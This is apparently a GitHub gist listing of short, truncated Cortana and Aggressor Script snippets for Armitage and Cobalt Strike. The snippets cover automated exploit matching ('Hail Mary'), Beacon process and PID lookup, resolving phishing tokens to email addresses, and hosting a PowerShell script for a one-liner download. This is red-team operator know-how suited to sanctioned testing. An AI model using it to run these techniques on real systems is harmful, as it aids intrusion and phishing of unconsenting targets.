Raphael rsmudge
rsmudge / gist:6717127
Created September 26, 2013 17:02
Cortana Find Attacks / Hail Mary Samples (taken out of context, not tested in production, used for testing in a stripped down Armitage)
#
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
#
sub exploitPorts {
    local('$exploit %exploits $options $port');
    foreach $exploit (modules("exploits")) {
        $options = options("exploit", $exploit);
        if ('RPORT' in $options) {
rsmudge / gist:6717164
Created September 26, 2013 17:04
Cortana Hail Mary / Find Attacks Example (taken from my development testing... not tested recently. This code was used in a highly stripped down version of Armitage)
#
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
#
popup attacks {
    item "&Find Attacks" {
        spawn(&runFindAttacks);
    }
    item "&Hail Mary" {
rsmudge / irc.cna
Created February 19, 2016 16:24
Aggressor Script IRC Example
#
# Quick/Dirty IRC Library for use with Aggressor Script
# https://www.cobaltstrike.com/aggressor-script/index.html
#
# irc_close($handle);
sub irc_close {
    println($1, "QUIT :Good bye!");
    closef($1);
}
rsmudge / bot.cna
Created June 15, 2016 15:38
Demonstration of inversion-of-control using co-routines in Aggressor Script.
# demonstrate an example of inversion-of-control with Aggressor Script
#
# co-routine,
sub bot {
    # run pwd and get the output.
    bpwd($bid);
    when("beacon_output_alt", $this);
    yield;
rsmudge / getpidany.cna
Created May 2, 2016 16:30
Get PID of Any Process
# getanypid($bid, $proc, &callback);
sub getanypid {
    bps($1, lambda({
        local('$pid $name $entry');
        foreach $entry (split("\n", $2)) {
            ($name, $pid) = split("\\s+", $entry);
            if ($name eq $proc) {
                # $1 is our Beacon ID, $pid is the PID of $proc
                [$callback: $1, $proc, $pid];
            }

# getexplorerpid($bid, &callback);
sub getexplorerpid {
    bps($1, lambda({
        local('$pid $name $entry');
        foreach $entry (split("\n", $2)) {
            ($name, $pid) = split("\\s+", $entry);
            if ($name eq "explorer.exe") {
                # $1 is our Beacon ID, $pid is the PID of explorer.exe
                [$callback: $1, $pid];
            }
rsmudge / tokenToEmail.cna
Created March 31, 2017 21:58
This script demonstrates how to change Cobalt Strike's WEB_HIT and PROFILER_HIT hooks to resolve a phishing token to an email address.
#
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
# resolve the id var (token) to an email
#
# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html
#
# method, uri, addr, ua, response, size, handler, when
set WEB_HIT {
    local('$out $now $method $uri $addr $ua $response $size $handler $when $params');
rsmudge / getenv.cna
Last active December 11, 2019 19:45
#
# Aggressor Script means to parse/use environment vars in a Beacon session.
#
global('%bvars');
# request environment variables for every new Beacon that comes in.
on beacon_initial {
    # ideally, we'd have a bshell that could take callbacks. We don't have
    # this yet. Eventually though, we will.
rsmudge / safedelete.cna
Created September 1, 2017 16:56
Override the default file browser popup in Cobalt Strike to prompt the user when they try to delete a file.
#
# safe delete in file browser right-click menu
#
popup_clear("filebrowser");
popup filebrowser {
    item "&Download" {
        local('$file');
        foreach $file ($3) {
            bdownload($1, "$2 $+ \\ $+ $file");
rsmudge / oneliner.cna
Created July 7, 2016 21:07
How to host a large script via Beacon and grab it with a one-liner that connects to localhost.
# host a PowerShell script on a one-off web server via Beacon.
#
# Why? Generate one-liners for length-constrained command execution opportunities
#
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
# if there's interest in this capability, I can build an official API for it.
import common.*;
import beacon.*;